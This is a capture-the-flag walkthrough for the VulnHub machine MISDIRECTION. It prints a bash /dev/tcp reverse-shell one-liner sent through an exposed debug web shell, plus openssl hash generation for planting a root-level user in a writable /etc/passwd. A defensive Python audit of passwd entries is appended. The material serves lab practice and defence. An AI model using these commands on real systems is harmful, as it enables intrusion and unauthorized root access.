Hacking MISDIRECTION - VulnHub

Neelesh Patel
Sep 13, 2021

(OSCP similar practice machine)

Vulnhub Description

The purpose of this machine is to help OSCP students further develop, strengthen, and practice their methodology for the exam.

So let’s dive into pwning the machine and gaining a root shell.

______________________________________

Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128

To start, let’s go for scanning and enumeration. I got the results as:

Hmm... we got some standard ports. Both 80 and 8080 have a webpage up and running. So first I hopped over to http://192.168.230.128:8080.

After that I brute-forced the web directories to find some way in, and the results that showed up are:

After enumerating all of these, the interesting ones I found are:

/debug, /wordpress

WordPress was hardcoded with the IP 192.168.1.61:8080. Either I update my /etc/hosts file or review it later (I have my doubts because of the machine’s name ;-/).

So I jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!

So I ran this command to get a reverse shell:

/bin/bash -c '/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &'

My box was listening on this port, and YES!! we got a shell. Checking the allowed sudo permissions, we got something very easily:

Okay, so without further ado, as per the results, I switched to bretix. This user is allowed to edit /etc/passwd. AWESOME!!!

Now we are going to create a user on the target machine by adding its entry to the /etc/passwd file. Here we’ll use openssl to generate a salted hash:

openssl passwd -1 -salt user3 pass123

Back on the target machine, we use the hash generated in the previous step to create a user neelesh with elevated privileges. Now all we have to do is run the su command with the user name we just created, enter the password, and we get a root shell.

And we are root!!
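
From the defender's side, the /etc/passwd change used above leaves clear traces. The Python check below is an added example, not part of the original write-up: it flags passwd entries that carry a password hash or a UID of 0 under a non-root name, and ownership or mode bits that let a non-root user edit the file. The function names and the sample entries (including the placeholder hash) are constructed for illustration.

```python
import os
import stat

# Constructed sample in /etc/passwd format; the hash is a placeholder, not real output.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
neelesh:$1$user3$CONSTRUCTED.HASH.PLACEHOLDER:0:0:root:/root:/bin/bash
"""

# Values expected in field 2 when hashes live in /etc/shadow or the account is locked.
NO_HASH = {"x", "*", "!"}

def audit_passwd(text):
    """Return (user, reason) findings for passwd-format text."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in NO_HASH:
            findings.append((user, "password hash stored in passwd"))
        if uid.isdigit() and int(uid) == 0 and user != "root":
            findings.append((user, "UID 0 account other than root"))
    return findings

def audit_mode(st_mode, st_uid, st_gid):
    """Flag ownership or mode bits that let a non-root user edit the file."""
    problems = []
    if st_uid != 0:
        problems.append("not owned by root")
    if st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st_mode & stat.S_IWGRP and st_gid != 0:
        problems.append("group-writable by non-root group")
    return problems

if __name__ == "__main__":
    for user, reason in audit_passwd(SAMPLE):
        print(f"{user}: {reason}")
    if os.path.exists("/etc/passwd"):
        st = os.stat("/etc/passwd")
        print("/etc/passwd:", audit_mode(st.st_mode, st.st_uid, st.st_gid) or "ok")
```

On a healthy system /etc/passwd is owned by root with mode 644, so audit_mode returns an empty list and every entry has x in the password field.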

That’s all for now,

Until Next Time,

I’m Neelesh, Thanks for the read…

— — — — — — — — — — — — — →

Ping me if you face any issues

Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/

— — — — — — — — — — — — — →
